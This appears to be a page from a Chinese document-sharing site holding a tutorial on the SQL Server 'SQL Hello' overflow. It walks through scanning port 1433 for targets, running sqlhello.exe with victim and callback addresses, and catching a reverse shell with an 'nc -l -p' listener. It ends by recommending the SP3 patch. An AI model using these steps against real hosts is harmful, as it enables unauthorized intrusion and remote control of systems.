sql hello exploit 漏洞的利用.docVIP

  1. 1、本文档共6页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
sql hello exploit 漏洞的利用

题目:sql hello exploit 漏洞的利用 一介绍: SQL Server是微软对抗Oracle推出的数据库。占领的市场份额已经仅次于Oracle,居世界第二,但是其安全性也一直受到用户的置疑。从1996年,微软公司推出的SQL Server 6.5版本到1998年推出的SQL Server 7.0,以及2000年8月推出了SQL Server2000,还有后来新出的SQL Server2005。在版本和功能不断升级的情况下,安全问题却没有得到很好的改善。不断发布针对SQL Server的安全公告和补丁。2003年1月24日,针对SQL Server的“Slammer”的蠕虫在Internet上肆虐,导致网络流量激增,严重影响了世界范围内的计算机和网络系统。SQL Server的漏洞引起了各大安全公司和厂商的重视,因此NFR也立即发布了多个针对SQL Server的攻击签名。但是在使用过程中,发现NFR针对漏洞的报警非常多。 这个漏洞是针对SQL Server数据库来的,SQL Serve数据库是微软公司推出的,应用非常广泛。 二、扫描是通过端口:1433端口。 现在告诉大家应该怎么能找到这个有SQLhello这个漏洞的主机,这个漏洞没有什么专用的扫描软件,扫描之后它会显示哪个存在哪个不存在。扫描一般来说有两种方式,一种是通过专有的扫描工具,另一种是通过端口来判断它的服务,通过它的服务来推进它的漏洞。今天我们就通过第二种手段来,主要就是通过它的端口来判断它的服务,通过它的服务来推进它的漏洞。这个是什么意思,就是这个网站它是否存在漏洞,要注意几个问题:首先扫描它一个端口,就拿sql server这个漏洞来说,首先扫描它的1433这个端口,看这个端口是否开放,要是开放我就可以断定它安装了sql server服务,安装了这个服务之后,我们就可以进行相应的漏洞进行溢出。如果它不安装这个sql server这个数据库,咱们就不可能对它进行溢出,前提条件是它开放了1433端口,它不开这个1433端口就没法对它进行远程溢出,我们现在要做的事情不是扫描主机,看哪台主机开了1433端口。它有没有漏洞我们并不知道,所以要经过第三部的验证。对它进行溢出,看它是否能溢出成功。 三、溢出,两个程序一个是正向溢出一个是反向溢出。 首先我们使用反向连接来给大家演示。 nc –l –p 端口 在本地监听一个端口等待对方来连接 我们先来运行一下sqlhello.exe这个程序 SQL Hello Exploit - Remote Shell Callback by JoePub 这里是注释,就是谁写的 sqlhello victimip victimport callbackip callbackport 程序名 这个是IP 这个是端口  IP     端口 反向连接的概念,要有一个目标主机的IP和端口,还要填写上自己的IP地址和端口,还要用NC进行监听。 victimip Address of host to send exploit payload       这里的英文写着地址,就是要攻击的目标主机IP victimport Port to attack on victim callbackip Address of host to callback on succesful exploit callbackip Port to connect to on callback IP sqlhello 目标主机IP 目标主机开放端口1433 本机IP 本机端口 向目标主机的IP的1433端口发送溢出程序,发送溢出程序之后,对方就是目标主机的溢出程序,有什么功能呢,它可以自动连接到这个IP的端口,远程的返回我们的IP 正向连接 正向溢出虽然简单,但有缺点,有可能会被防火墙拒绝。 反向溢出是对方的主机主动连接到我们,这样可以防范大部分的防火墙。所以说有防火墙的时候反向溢出的成功率比正向连接的成功率要大。 四、解决方案 下载sql server SP3补丁以上。 1

文档评论(0)

wuyuetian + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档